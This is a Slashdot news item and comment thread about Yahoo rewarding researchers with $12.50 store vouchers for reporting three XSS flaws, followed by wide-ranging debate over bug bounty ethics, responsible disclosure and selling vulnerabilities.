Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Security Researchers Rewarded With $12.50 Voucher To Buy Yahoo T-Shirt

Unknown Lamer posted about a year ago | from the gimme-more-or-ill-hack-ur-serverz dept.

Security 138

Hugh Pickens DOT Com writes "More and more companies are offering Bug Bounty Programs remunerating security researchers for reporting vulnerabilities and weaknesses in their applications and software. Now Security analyst Graham Cluley writes that researchers at High-Tech Bridge informed Yahoo's Security Team about three cross-site scripting (XSS) vulnerabilities affecting the ecom.yahoo.com and adserver.yahoo.com domains. According to High-Tech Bridge, each of the vulnerabilities could compromise *any* @yahoo.com email account. All that was required was that the victim, while logged into Yahoo, should click on a specially-crafted link received in an email. Forty-eight hours later, Yahoo had patched all of the vulnerabilities and Yahoo's security team responded, thanking the researchers and 'offering the mighty bounty of err.. $12.50 per vulnerability,' writes Cluley. But there was one catch. The $12.50 was given as a discount code that can only be used in the Yahoo Company Store, which sells Yahoo's corporate t-shirts, cups, pens and other accessories."

cancel ×

138 comments

Sorry! There are no comments related to the filter you selected.

So . . . (1)

Mitchell314 (1576581) | about a year ago | (#44999701)

What's the problem? :P

Re:So . . . (5, Funny)

kthreadd (1558445) | about a year ago | (#44999813)

Have you seen the new Yahoo logo?

Re: So . . . (0)

Anonymous Coward | about a year ago | (#45000097)

uninspired, shallow.. see the smart people jumping the ship soon.

Re: So . . . (1)

sonamchauhan (587356) | about a year ago | (#45000709)

"Have you seen the new Yahoo logo?

That's smart... see the uninspired, shallow people jumping the ship soon."

Seriously, its a silly logo and all that jazz, but wouldn't you leave a company because it no longer the right employer? *

* Where right_employer = (pay && boss && peers && benefits && work_conditions && commute && ! good_self_employment_prospects)

And not because the logo was terrible?

Re: So . . . (0)

Anonymous Coward | about a year ago | (#45001219)

If that was bad, my check, from my boss bounced!

Re: So . . . (0)

Anonymous Coward | about a year ago | (#45002753)

Smart people are long gone from Yahoo!

Re:So . . . (-1, Flamebait)

TWiTfan (2887093) | about a year ago | (#45001217)

Come on, they have a woman in charge now. You're surprised they value appearances over substance?

Now, go on and mod me down. You know there's truth in what I'm saying, you're just too PC to admit it.

Re:So . . . (0)

Anonymous Coward | about a year ago | (#45002269)

Come on, they have a woman in charge now.

Poor little MRA, huddling in his parents' basement. Are you going to Chuck-E-Cheese's for your 40th?

Re:So . . . (-1, Troll)

TWiTfan (2887093) | about a year ago | (#45002721)

Are you going to Chuck-E-Cheese's for your 40th?

Are you going down to the ghetto to apologize for yours?

Re:So . . . (1)

datavirtue (1104259) | about a year ago | (#45005359)

Yahoo with its new zipper logo strikes me as one of those parking pages that serves lame, untargeted ads.

Re:So . . . (5, Funny)

mwvdlee (775178) | about a year ago | (#44999817)

Surely they sell a T-shirt that reads "I saved Yahoo! public embarrasement, millions of dollars in damages and all I got was this lousy T-shirt".

Re:So . . . (1)

slashmydots (2189826) | about a year ago | (#45001481)

Considering how many Yahoo accounts I know that got hacked (probably double digit percentages of all that exist), they didn't necessarily "save" them from anything. They "bailed them out of a class 5 shitstorm" maybe.

Re:So . . . (1)

davester666 (731373) | about a year ago | (#45004841)

No, they didn't bail them out of anything. Yahoo is in the middle of their "hey, lets recycle old user email names that haven't been logged into recently. what could go wrong?" debacle.

Re:So . . . (1)

idontgno (624372) | about a year ago | (#45003509)

Depending on the T-shirt [yahoo.com] , the slogal might have to say "I saved Yahoo! public embarrasement and millions of dollars in damages, and all I got was a discount on this lousy T-shirt." to be perfectly accurate.

Re:So . . . (3, Funny)

Anonymous Coward | about a year ago | (#44999869)

There weren't any in XXL.

Re:So . . . (4, Funny)

squiggleslash (241428) | about a year ago | (#45000757)

I know, at least Yahoo! didn't insult them by offering them a job at Yahoo! or something...

Re:So . . . (4, Insightful)

buchner.johannes (1139593) | about a year ago | (#45001393)

At least Yahoo! thanked them explicitly and didn't threaten to sue them.

Re:So . . . (4, Informative)

hairyfeet (841228) | about a year ago | (#45002595)

The problem is that Yahoo just sent out a message to every grey hat, letting them know "if you want anything other than a T-Shirt talk to the metasploit guys" and ya know what? they will. Its not just about the money, its about respect. A t-shirt is the kind of prize you get from some DJ standing on a street corner NOT what you get for saving a company endless bad press and possible millions in pissed off users.

Of course the real bitch isn't just the XSS, its when you mix that with an insecure browser you get a real perfect shitstorm. See my journal for what I labeled the "Yahoo porn bug" a couple years back, if you take Yahoo and ONLY Yahoo, didn't see this with either Gmail nor Live mail, and Firefox which again ONLY FF, not any of the Chromium or Webkit browsers nor Opera nor IE, put them together and what do you get? you get the ability for spammers to be able to spam entire address books without having any real access at all. They do this by using the fact that FF runs at the same permission levels as the user (which is retarded but Moz refuses to fix, Chromium had the ability to run below user permission more than 6 years ago) and with a hidden iFrame and using the FF auto login (or even just a still valid cookie) they could have access to the entire address book without having to break into the account or even send a drop of data back to themselves.

So as I've been saying for a few years now yahoo really needs to get their shit together, its entirely too easy to use Yahoo email addresses for spamming. The same can be said of Moz, I no longer include any gecko based browsers specifically because they refuse to add low rights mode. Bad security practices are bad practices and insulting those that find bugs by giving them a lousy $12.50 t-shirt? They have made sure the next bug found by a grey hat will only be found out by Yahoo when they are getting pwned.

This is news? (4, Insightful)

Anonymous Coward | about a year ago | (#44999739)

They had many choices, simple two choices: Report bug and get $12.50, amazing yahoo was not giving them tree fidy.
  They could have gone onto some darknets and sold the report for $100,000+. The choice was theirs to make.

Re:This is news? (5, Insightful)

Dexter Herbivore (1322345) | about a year ago | (#44999835)

They had many choices, simple two choices: Report bug and get $12.50, amazing yahoo was not giving them tree fidy. They could have gone onto some darknets and sold the report for $100,000+. The choice was theirs to make.

Which is exactly why Yahoo should have paid them more. Make the choice less obvious and save themselves a lot of grief further down the line.

Re:This is news? (5, Insightful)

Sockatume (732728) | about a year ago | (#45001079)

Or paid them nothing. A small material reward is often more insulting than no reward but having done the right thing.

Re:This is news? (4, Insightful)

CODiNE (27417) | about a year ago | (#45002865)

When a diner doesn't leave a tip the waiter can reason "Maybe they forgot".

Now when the diner leaves a nickel on the table....

Re:This is news? (0)

Anonymous Coward | about a year ago | (#45002867)

As someone that has recently walked out on years of employment and burned a bridge because of a thirteen cent raise, I agree.

The worst of it is the same in this case. Someone decided the exact amount of my raise just as someone decided exactly what these security researchers get. Somebody had to decide that thirteen dollars was too much, but twelve dollars was too little. Someone made that decision and thought it was the right thing to do. It is a slap in the face with a glove instead of a handshake.

Re:This is news? (4, Insightful)

6Yankee (597075) | about a year ago | (#45002873)

Absolutely.

When I worked in McJail, the grease trap exploded on one of my night shifts. BLAM! Couldn't use the sinks, and (once it had all rained back down from the ceiling and flowed down the walls) the back-room was ankle deep in nasty. In order to get the place ship-shape for the morning, I took all the dirty equipment to the local gas station and jet-washed it on my own dime, after rolling in the grease trying to unblock the pipe with my bare hands. While the other two put the rest of the store in order and went home, I was still there three hours after the end of my shift, cleaning up the mess as fast as it could drip from my body.

The store manager gave me a warm and heart-felt thank-you, although she had the good sense to refrain from shaking my hand. Then she gave me a present. It was the free plastic pen that the plumber had given her.

From there on in, every time I was tempted to go above and beyond the call of duty, I thought of that pen. That was ten years ago, and I still have it somewhere as a reminder.

Re:This is news? (1)

Anonymous Coward | about a year ago | (#45003575)

Wow you were quite the sucker at the time. It's a shame that we all need go learn the lesson that on average corporations and management don't really care about us. You're just another brick in the wall.

Re:This is news? (1)

MickLinux (579158) | about a year ago | (#45004115)

Quote from Farmer Boy (Laura Ingalls Wilder): "Keep you nickle; I can't make change."

Re:This is news? (3, Insightful)

rapiddescent (572442) | about a year ago | (#44999903)

at my local OWASP chapter meeting some months ago, we did a show of hands about how many people had reported via the pay-for-security-bug middlemen organisations rather than contacting the vendor/website directly. About 30% put their hands up. I was quite astounded although, having been threatened legally myself when I was called in a bug found on an eComm website then I would no longer go directly to the owner of the system unless I had a contract in place already. The money is apparently quite good; so long as you don't care who is using the bug...

Re:This is news? (3, Insightful)

Joining Yet Again (2992179) | about a year ago | (#45000009)

Oh, for fuck's sake, this argument is just awful. "Well, people SHOULD pay protection money, because otherwise anyone with enough strength might break their legs."

This is mafia reasoning, and it's shameful that geeks are increasingly engaging in this sort of argument.

Guess what? I can also break into most people's houses and nick their stuff without getting caught. They have ground floor windows, old doors, &c. That doesn't mean they owe me anything for NOT doing that, nor for sending them unsolicited notices that it would be easy to take their stuff. Indeed, English law at least is comfortable with the idea that you never owe anything for unsolicited work, even if it's beneficial. No one was making these "hackers" do the work - they were either bored or wanted the notoriety.

Re:This is news? (1)

Anonymous Coward | about a year ago | (#45000463)

Oh, for fuck's sake, this argument is just awful. "Well, people SHOULD pay protection money, because otherwise anyone with enough strength might break their legs."

Actually, companies SHOULD pay for proper security, be it their own staff, contractors or "independent" security researchers. Since nothing ever happens to these companies WHEN they expose customer information WHEN they get hacked I have no sympathy for them at all. If you act irresponsibly then you don't get to cry about the results.

Re:This is news? (2)

Joining Yet Again (2992179) | about a year ago | (#45000535)

I'm not sure what cognitive fault causes people to blame the victim, but it seems like a common thought process.

Yes, companies should take more care with data (or, more widely, people should stop putting their data in the hands of random private businesses).

No, that doesn't mean it's their fault when someone malicious takes the data.

No, protection money is never an acceptable demand.

Re:This is news? (5, Insightful)

chaboud (231590) | about a year ago | (#45000589)

There is no cognitive fault, but instead, a conditioned, and, frankly, dangerous, view of software as protected by legal remedy. This idea has left us with shit software supported by careless organizations propagating paper-thin security already compromised by rafts of governments. A network is a dangerous place, and software and hardware should treat networks like the wild west when it comes to privacy/security.

On your other point, regarding "protection money," the reasoning is rather simple. People respond to incentives. If hackers have little to no financial reason to disclose a vulnerability to Yahoo, some may be motivated to find other ways to monetize their efforts. Forget legality/morality for a second and just think about incentives. What Yahoo is doing is removing their incentive for responsible disclosure. By providing a T-Shirt voucher, they're probably incentivizing attack by otherwise disinterested parties, just for the middle-finger of it all.

Re:This is news? (1, Insightful)

Joining Yet Again (2992179) | about a year ago | (#45000919)

Forget legality/morality for a second

No, that's an awful idea.

and just think about incentives.

My incentive is that I build a better society through responsible disclosure. Morality helps me reach that conclusion.

Re:This is news? (1)

TrollheartBlue (2944865) | about a year ago | (#45002345)

My incentive is that I build a better society through responsible disclosure. Morality helps me reach that conclusion.

That's you though with your morality. There are plenty of skilled people out there who don't care about building a better society or who have different moralities. There is no one "right" morality. I think your fallacy is believing that you hold a universal world view.

Re:This is news? (1)

Joining Yet Again (2992179) | about a year ago | (#45003235)

There are plenty of skilled people out there who don't care about building a better society or who have different moralities.

And they must be dealt with, not pandered to.

Re:This is news? (2)

war4peace (1628283) | about a year ago | (#45002567)

Think of it from another angle.
The money incentive is good enough of a reason to start researching. It's a matter of choice. between companies A, B and C, where A definitely offers a reward, B "might" offer you something crappy and C gives you the finger or even worse, sues you, WHAT would you choose? It's equally moral to research for all the above companies, and equally moral to provide them the results; I agree with that. But then, once the moral equality exists, you look at other parts of the deal, and pick the best one.

THAT is where Yahoo loses.

Re:This is news? (1)

Joining Yet Again (2992179) | about a year ago | (#45003651)

Erm, bounties aren't a good reason to start security research. "Bounty hunting" is in a primitive form of compensation which is usually supplanted by more stable, reliable arrangements for all parties.

If you're good at that sort of thing, you get a perm job, being paid the money Yahoo would allocate to employees rather than PR exercises.

I mean I think Yahoo has been pointless since before the turn of the millennium, but that's another matter...

Re:This is news? (1)

war4peace (1628283) | about a year ago | (#45004443)

Erm, bounties aren't a good reason to start security research

No, they're a good reason to pick which one to research, out of many options otherwise equal.
It's like this: I have a lawn mower, and in front of me there are three houses which need mowing. Should I pick the one where the owner gives me 10 bucks, the one where he gives me a "thanks" or the one where the guy chases me down the road with a shotgun, shooting salt pellets at my ass?

If you're good at that sort of thing, you get a perm job, being paid the money Yahoo would allocate to employees rather than PR exercises.

That's outside the scope of the conversation. Maybe you already have that job and are doing extra stuff for fun. Fun is in all cases, but the extra small cash you make is the glazing on the cake. Or you could go banzai and pick the company which would sue you. Living on the edge is the thing for some people.

Re:This is news? (1)

Anonymous Coward | about a year ago | (#45002789)

Yahoo has ensured that the next time someone finds a vulnerability in their webpage, it will go up for sale only to criminal organizations. You can argue until you're blue in the face about what should be, but that doesn't have an impact on what is.

Re:This is news? (1)

Joining Yet Again (2992179) | about a year ago | (#45003471)

Just because you're a cunt, it doesn't mean everyone who finds a vulnerability is.

Re:This is news? (1)

ToddInSF (765534) | about a year ago | (#45005085)

I'd like to see hackers go after Yahoo's CEO and board members. Embarass them all. Get them all fired.

As a matter of fact, I'd like to see this done to many corporations. It's really the last avenue free people have in our new tech totalitarian corporatogovernment fascism.

Re:This is news? (4, Insightful)

AmiMoJo (196126) | about a year ago | (#45000795)

I see it differently. In real life we pay for cops via taxes. Part of their job is to offer advice and even survey your home for ways that criminals might break in. It's part of the service.

The internet doesn't have cops, but it does have criminals. Fortunately there are good guys who are willing to report flaws when they see them. Unfortunately many companies react to this helpful advice by threatening to sue or even trying to have the white hat arrested. Bug bounties make it clear that the company sees reporting as a valuable service and intends to act swiftly on reported problems.

Bug bounties also encourage people to look for issues from the outside, which is apparently quite valuable since the people on the inside seem to miss them quite often.

Companies should pay bug bounties when the issue is security, not as a kind of protection money but as a way of saying they take security seriously and wish to reward those who help them with it.

Re:This is news? (1)

Joining Yet Again (2992179) | about a year ago | (#45000961)

The internet doesn't have cops

Erm, yes it does. Law enforcement are as aware of the Internet as anything else. Perhaps they misallocate resources, and perhaps that's what you need to concentrate on fixing.

Unfortunately many companies react to this helpful advice by threatening to sue or even trying to have the white hat arrested.

Anonymous reporting is easy. If you attach your name to a public report then you're really using the threat of crime for personal profit. Try not to think about it from the PoV of the ego of the hacker.

Companies should pay bug bounties when the issue is security

They're welcome to offer them, although it's really more a PR thing "We're already so secure that we only expect to pay out a small amount from this fund." It's not really a significant method of fixing bugs in your product.

Re:This is news? (1)

TheRealMindChild (743925) | about a year ago | (#45001105)

Part of their job is to offer advice and even survey your home for ways that criminals might break in.

No, sir. Their job is to collect evidence of a crime. Their job is not to protect and serve. Their job is to send the bad guys to jail

Re:This is news? (2, Informative)

Lumpy (12016) | about a year ago | (#45001303)

"I see it differently. In real life we pay for cops via taxes. Part of their job is to offer advice and even survey your home for ways that criminals might break in. It's part of the service."

What utopia is that that you live in? Because here in the USA they do not do this at all. The police advice to me is, "do not own a weapon, in the case of a home invasion hide under your bed and call the police. Do not fortify your doors and windows as that is a crime."

Yes, Fortification of doors and windows in the USA is a CRIME. It makes it harder for cops to raid your home if they need to.

Re:This is news? (0)

Anonymous Coward | about a year ago | (#45002265)

What state do you live in cause I will not move there... I can fortify my doors and windows all I want so long as there is a fire exit. {AKA you have to be able to open them from inside in the event of an emergency}

Re:This is news? (1)

Lumpy (12016) | about a year ago | (#45003549)

Okalahoma, Michigan, Wisconsin, Illinois all have laws on the books to make home fortification illegal. I am certain there are more out there.

Re:This is news? (0)

Anonymous Coward | about a year ago | (#45003593)

where a felony offense prohibited by the Uniform Controlled Dangerous Substances Act is being committed, or attempted, and the fortification is for the purpose of preventing or delaying entry or access by a law enforcement officer, or to harm or injure a law enforcement officer.

Bars on your door or windows are considered there to delay access by an officer. and they WILL use that law against you.

Re:This is news? (1)

Wycliffe (116160) | about a year ago | (#45001449)

>
> In real life we pay for cops via taxes. Part of their job is to offer advice and even survey your home for ways that criminals might break in. It's part of the service.
>

Where are you located? I've never heard of public cops giving home inspections. I've had ADT,etc... give advice (i.e. try to sell me stuff)
and I've even had landscapers give advice (again, try to sell me on work), but I've never heard of public cops giving home audits.
The only home audits I've heard of in the USA are energy audits which are sometimes free to some people if they are low income or live
in certain areas. The only advice I've even seen from cops, etc... are signs or announcements that state things like "lock your car doors,
don't leave valuables in plain sight" Other than possibly getting off-the-cuff recommendations AFTER a break-in occurs where have you
heard of cops doing surveys and giving advice on how to prevent breakins.

Re:This is news? (0)

Anonymous Coward | about a year ago | (#45002049)

I'm sorry if you worked for me and had 10k laying in plain sight on a counter in busy store.... I would fire you even if it doesn't get stolen. It doesn't matter to me that you didn't do it intentionally you have created an undesired and very unnecessary dangerous situation.

The guy that tells me you did it is not a racketeer and if I want to relate it to the article he is the security guard next door. {He doesn't work for me and is not obligated to provide security for me but he is a security professional and did anyway, I would through him a few dollars}

Re:This is news? (1)

Joining Yet Again (2992179) | about a year ago | (#45003687)

The guy who merely tells you is not a racketeer.

The guy who threatens to commit a crime against you if you don't pay him money IS a racketeer.

Re:This is news? (0)

Anonymous Coward | about a year ago | (#45004215)

I'm not sure what cognitive fault causes people to blame the victim, but it seems like a common thought process.

Yes, companies should take more care with data (or, more widely, people should stop putting their data in the hands of random private businesses).

No, that doesn't mean it's their fault when someone malicious takes the data.

No, protection money is never an acceptable demand.

They're no longer the victim when they cross the line into negligence. This is even codified into law, many, many times.

So you want their work for free???? (0)

Anonymous Coward | about a year ago | (#45000539)

COMMUNIST!

As long as the beneficiary is a corporation, that is...

Sorry, you wanted work done, you should pay for it. you get what you pay for and how much work do you want for $12.50 that is not even worth that since you can at least pay rent with cash. Pay your landlord with a voucher instead and see how much it's worth...

Re:This is news? (0)

Anonymous Coward | about a year ago | (#45000887)

How about being paid for time and expertise? Take the average salary of a software developer at yahoo and the average time it takes to find it, double the number, and offer it as a reward.

They didn't pay their people to find it and they didn't pay the people who did find it. The exploit was worth thousands of dollars on the free market and took hours of time to find. This behavior encourages taking business elsewhere.

Re:This is news? (1)

Capt.Albatross (1301561) | about a year ago | (#45001507)

Oh, for fuck's sake, this argument is just awful. "Well, people SHOULD pay protection money, because otherwise anyone with enough strength might break their legs."

You must be a philosopher, because your analysis, and the course of action that you derive from it, is only valid in a possible world that we don't live in. In the real world, society incurs expenses all the time to protect itself from malicious parties. Last time I bought a car, they were still putting locks on them. If you want to get worked up over this, you should start with the defense budget of the nation you live in.

Re:This is news? (1)

Maxo-Texas (864189) | about a year ago | (#45000555)

http://news.yahoo.com/yahoo-ceo-ranked-2nd-companys-2012-pay-scale-001129756.html [yahoo.com]

Regulatory documents filed Tuesday revealed that Mayer received a pay package valued at $36.6 million last year. Most of the compensation consisted of stock awards that Mayer got in July when she ended a 13-year stint as a top Google executive to become Yahoo's CEO.

Most of the components of Mayer's pay had been previously disclosed.

It wasn't previously known that Mayer ranked second on Yahoo Inc.'s pay scale last year.

Henrique de Castro, another former Google Inc. executive who became Yahoo's chief operating officer in November, eclipsed Mayer with a compensation package valued at $39.2 million.

Why do people still do this anymore? (1)

Anonymous Coward | about a year ago | (#44999741)

Don't you know that security vulnerabilities go into the NSA arsenal before they are fixed? Why do you still do "responsible disclosure"? Why do you work with the vendors at all? Security vulnerabilities are valuable, but you're propping up a corrupt system and get only peanuts in return, if anything. The NSA does not have moral hangups about their war on the internet. They use what you give them to undermine any and all security protocols. The only problem that companies like Yahoo have with cooperating is when they're found out. They have no shame, only interests.

Re: Why do people still do this anymore? (1)

cripkd (709136) | about a year ago | (#44999833)

And the solution is?
No, really, aside words an speaches made as if you're wearing a V mask.

Re: Why do people still do this anymore? (1, Insightful)

Anonymous Coward | about a year ago | (#44999841)

Sell them.

Re: Why do people still do this anymore? (1)

Anonymous Coward | about a year ago | (#44999909)

In which case the buyer might just be a straw man for the NSA.
So your choice basically is: Tell the company and risk that the NSA gets it as well, or sell it and risk that only the NSA gets it. Now, which one is more responsible?

Re: Why do people still do this anymore? (1)

chaboud (231590) | about a year ago | (#45000595)

Well, you still have it. It's a vulnerability, not a teddy bear.

Re: Why do people still do this anymore? (1)

cripkd (709136) | about a year ago | (#45000161)

How does that fix the problem? That's what solution means.

Solution: Don't look. (0)

Anonymous Coward | about a year ago | (#45000761)

If you can't be bothered to sell to a spammer, or don't have connections to sell it on the darknet, then don't do the work.

However, that doesn't solve the problem of security holes being in Yahoo services either. But that's Yahoo's fault.

They could also just ignore telling Yahoo at all and tell EVERYONE about it. Then people know Yahoo is insecure and can stop using it. The problem here is why should someone care to spend their time on searching and telling Yahoo alone about the bugs?

Re:Why do people still do this anymore? (3, Informative)

Anonymous Coward | about a year ago | (#45000149)

Which part of "Forty-eight hours later, Yahoo had patched all of the vulnerabilities" did you miss?

If you want to object here, then get that tinfoil hat straight and get some sharper Occam's razor.

Seriously, if you think "bug reported to Yahoo -> NSA demands it from Yahoo -> NSA quickly uses it to hack Yahoo's accounts in 2 days -> Yahoo patches it" is realistic, then you should realize that "NSA demands access to Yahoo accounts -> NSA leisurely browses through all Yahoo accounts they want" would be much more plausible.

FFS, learn the fucking difference between software on your PC and web services at least. In the latter case, govt spooks won't need any vulnerabilities if it comes to that - they can just come with a subpoena/NSL/whatever.

They must have an exclusive store (5, Funny)

viperidaenz (2515578) | about a year ago | (#44999759)

With the tshirt that says "I found a vulnerability and all I got was this lousy T-Shirt"

Re:They must have an exclusive store (1)

Anonymous Coward | about a year ago | (#44999851)

With the tshirt that says "I found a vulnerability and all I got was this lousy T-Shirt"

Or a T-shirt which says "I found a bug and all I got was this lousy mug".

Re:They must have an exclusive store (-1)

Anonymous Coward | about a year ago | (#44999961)

would mod you unfunny if there was an option for that

Re:They must have an exclusive store (3, Interesting)

antifoidulus (807088) | about a year ago | (#45000003)

Considering the ROI on security bug bounties, they really should have one that just has a Yahoo! logo and the text "I'm with stupid"

Re:They must have an exclusive store (0)

Anonymous Coward | about a year ago | (#45000427)

With the tshirt that says "I found a vulnerability and all I got was this lousy T-Shirt"

I wouldn't be surprised if that t-shirt costs $25 or more at the Yahoo store.

Re:They must have an exclusive store (1)

Reibisch (1261448) | about a year ago | (#45000923)

They'll also send a W2.

Freaking cheap .. (0)

Anonymous Coward | about a year ago | (#44999829)

what kind of cheap a&&ed finished plated poor 4 sides kind of reward is this ? honesty truly does not pay :\
Come on Yahoo . .at least fork over a complete , stitched and sewn together " We're cheap " tshirt.
How insulting it is to get that kind of reward :\ Might as well be a slap in the face and a kick in the crotch.

Wait! (0)

cripkd (709136) | about a year ago | (#44999845)

You don't know what 12.5 is ?!?
And you call yourselves geeks... Ahahahaha!

Re:Wait! (0)

Anonymous Coward | about a year ago | (#44999879)

Educate us, then. And let me educate you on how to correctly use punctuation: Question marks do not have a leading space. You look ridiculously French that way, in addition to sounding like a 14 y/o due to that "Ahahahahahah!"

Re:Wait! (0)

cripkd (709136) | about a year ago | (#45000215)

Swoosh!
See? No trailing space. I learned MY lesson. You should google humor in general, irony in particular.

Re:Wait! (0)

Anonymous Coward | about a year ago | (#45003155)

I think you may need to look up humor. There does not appear to be anything funny in your post, perhaps you just left it out?

Re:Wait! (0)

Anonymous Coward | about a year ago | (#45000021)

100/8. Your point?

Better idea (1)

atari2600a (1892574) | about a year ago | (#44999859)

Why not half of what an exploit like that could cost on the black market, because that's how much it'll cost to even begin to look like anyone will pay attention to their 'bug bounty program'.

Better than Microsoft (rember this story?) (3, Interesting)

Anonymous Coward | about a year ago | (#44999949)

When Microsoft lost their Hotmail domain name, some guy snatched it and kindly returned it to Microsoft because he thought it was the right thing to do, to protect Microsoft from their stupidity. Well, Microsoft sent him a personal thank you note and that was all. Yep, the guy could have legally resold the domain for like a billion dollars (wouldn't be the first time.. ahem, live.com) and gotten away with it. All he got was a lousy certificate of gratitude.

Re:Better than Microsoft (rember this story?) (3, Informative)

Anonymous Coward | about a year ago | (#45000815)

You mean this guy [doublewide.net] who got a cheque for $500 and a bunch of software for a problem that took him 2 minutes and $35 to address?

Re:Better than Microsoft (rember this story?) (1)

sl4shd0rk (755837) | about a year ago | (#45001727)

All he got was a lousy certificate of gratitude.

Maybe all the people using hotmail could pony-up $2.00 for the guy. After all, they are the ones who would really be affected should the domain be sold.

Not bad (5, Funny)

Anonymous Coward | about a year ago | (#44999973)

C'mon. This is WAY better than the Standard Operation Practice: suing them into the ground.

We're moving forward, it seems.

Quit whining. (0)

Anonymous Coward | about a year ago | (#44999979)

No-one forced you to fix any bugs. If you want to be a 'security researcher', either fix bugs for people who have said that they want you to and will pay you, suck up the $12.50, or do 'full disclosure' (and get nothing but the kudos).

Don't play by the rules, then come whining when you don't like what you get. The internet is not your personal army.

If you don't like the way it is, try being a street sweeper instead. (Note that here too, you usually have to have a prior agreement with a municipality to clean the specific streets they want you to and get paid for it. You can't just sweep the streets you choose and then hassle the owners for cash.)

Re:Quit whining. (2)

Provocateur (133110) | about a year ago | (#45003115)

The vouchers are traceable. The REAL reward is coming AFTER the winner or researcher tries to claim it or use it at the store. Supply your own ending e.g. Congratulations, here's your new office...

So, where's the screwup? (0)

Anonymous Coward | about a year ago | (#44999983)

Well, $12.50 is certainly not worth the time and effort. But, it's not like the researchers could easily nor legally sell the information for a bigger profit. Having invested the time, they would've earned more fame/respect disclosing the vulnerabilities to the public.

Where's the major failure here? Well, the researchers should not have sold their research to yahoo for $12.50.

More fundamentally, for $12.50 a vuln, no reasonable person would expect yahoo to ever receive a notice via this system. Yahoo, however, has a monopoly as the only interested party and all they offer is $12.50. Take it or leave it.

I'd suggest finding a shady Russian bar and explain that you have services to offer to the organized crime syndicate to the bartender. The bartender will likely tell you to fuck off and that he knows nothing about this. Buy a drink and wait. Someone will speak to you.*

*: This may fail terribly.

Re:So, where's the screwup? (1)

Captain Hook (923766) | about a year ago | (#45000419)

Yahoo, however, has a monopoly as the only interested party ..... I'd suggest finding a shady Russian bar and explain that you have services to offer

But that is the whole point, Yahoo hasn't got a monopoly because they aren't the only interested party.

Next time, the researchers (not just these guys, but researchers in general) are going to ask why they should give Yahoo first bid when they know it's going to lead to nothing but an insult for their efforts.

That seems fine (1)

HalAtWork (926717) | about a year ago | (#45000039)

There was no expectation in the beginning except to get the problem solved, and that's what happened. Do you want them to hold the vulnerabilities for ransom or something? Maybe in the future some good samaritan will help you out with one of your problems too. Think of all the users you have helped out as well.

Re:That seems fine (1)

mysidia (191772) | about a year ago | (#45000917)

There was no expectation in the beginning except to get the problem solved, and that's what happened. Do you want them to hold the vulnerabilities for ransom or something?

Well... they didn't have to hold them for ransom; they could very well have taken the vulnerability to various dark spots on the internet and marketed it. I imagine, they could easily get a few hundred K selling a vulnerability like that on the open market.

Re:That seems fine (1)

Gavagai80 (1275204) | about a year ago | (#45001149)

You could make a lot of money auctioning information about all your neighbors and their valuables and schedules to local burglars too.

Re:That seems fine (1)

Gibgezr (2025238) | about a year ago | (#45003759)

Could you point me towards more information on this? I like the sound of this "sell out my neighbours on ebay" plan. Not all my neighbours, mind you, just one in particular.

It's not Yahoo's work. (1)

Anonymous Coward | about a year ago | (#45001127)

Why do you think that if someone finds a vulnerability in Yahoo's stuff their efforts now belong to Yahoo? What if the person just doesn't want to give it to Yahoo? Do you think that their work should be taken from them summarily? Maybe in the future, only those willing and able to sell the vulnerability to scammers and criminals will be the ones looking because the others had to find some other work that pays bills.

Where does it say... (0)

Anonymous Coward | about a year ago | (#45000073)

.. that the bounty has to be a large financial reward?

Why do I start thinking Portal 2 (0)

Anonymous Coward | about a year ago | (#45000277)

The testing area is just up ahead. The quicker you get through, the quicker you'll get your 60 bucks. Caroline, are the compensation vouchers ready?

-Cave Johnson

Motivation (1)

Anonymous Coward | about a year ago | (#45000443)

I think Yahoo acted correctly in this case. I think paying people to much for bugs will distort the security landscape. The reason is security is an issue about the common good. No vulnerability is good... even if it is in your competitors products. We should have a culture of assisting with security issues without expecting money for it.

What will we have? People selling vulnerabilities to the highest bidder which is socially acceptable? Note that the word here is social, NOT commercial.

Of course security researches needs to get paid... but I think there are other ways that will be more effective and more thorough. Grants to universities for security research, dedicated employees/teams focusing on security and possibly even government/industry bodies funded by tax and/or membership fees. And focus on security where the impact is the biggest... not which get the most headlines....

Re:Motivation (0)

Anonymous Coward | about a year ago | (#45000971)

That might be the case in a perfect world. Nowadays however we already have large black markets for vulnerabilities, so if the legitimate players offer bounties, they're at most leveling the playing field.

With conduct like this, only the very die hardest of white hat hackers will go to Yahoo from now on. And the 99% will just cash out elsewhere.

ebay of vulnerabilities (0)

Anonymous Coward | about a year ago | (#45000461)

how about creating a bidding portal like ebay but all about security vulnerabilities. illegal? then lets do an onion site.
$12.5 is pathetic and we should teach them a lesson.

The math is correct. (0)

Anonymous Coward | about a year ago | (#45001085)

They paid 12.50 for every user that still uses Yahoo.com

No career for professionals? (0)

Anonymous Coward | about a year ago | (#45001347)

Stuff like this makes me wonder if there will be any professional security researchers if no careers are possible. No one can make a living getting $12.50 occasionally. I thought we needed more security professionals, but if they can't have careers, we won't have them.

I wont touch them with a 50,000 ft pole (0)

Anonymous Coward | about a year ago | (#45001591)

I once registered domains through Yahoo! (They actually used an Australian company at the time)...

So one day I needed to setup my own DNS servers (which is one of their products), and after talking for what seemed like days with several of their "tech support" reps, who, no matter how hard I tried, just couldn't figure out what I was talking about. So I finally said something like "what is wrong with you people". His response was to hang up and delete my account leaving me stuck with a bunch of customers domains in limbo. I had to call Australia, arrange to transfer all the domains to another registrar... it was a mess.

F-U Yahoo! I won't touch you with a 50,000 ft pole. I won't visit your websites, groups, or answer email from your users. You are Yucky!

Life is not fair...what could we do? (0)

Anonymous Coward | about a year ago | (#45002307)

If I lend money to the bank, they pay me back 1% of interest....if I get a loan from them, for the same amount, I have to pay 3%.... fair?

when you have enough power.... (0)

Anonymous Coward | about a year ago | (#45002333)

the concept of honor, real gratitude, moral and values doesn't matter ...you just crush your enemies....and if they are crushing you, after killing half of your soldiers, you make a deal..

Better to give nothing (2)

istartedi (132515) | about a year ago | (#45002403)

Wow. That's all kind of fail. It would be better for Yahoo to state as a matter of policy that they don't pay bounties. You might disagree with that; but at least you'd respect it. What they did instead is the equivalent of leaving a nickel tip at a restaurant. Giving nothing makes you look cheap, careless or unaware of tipping customs. Giving the nickel says, "yes, I know I should tip, here's what I think you're worth".

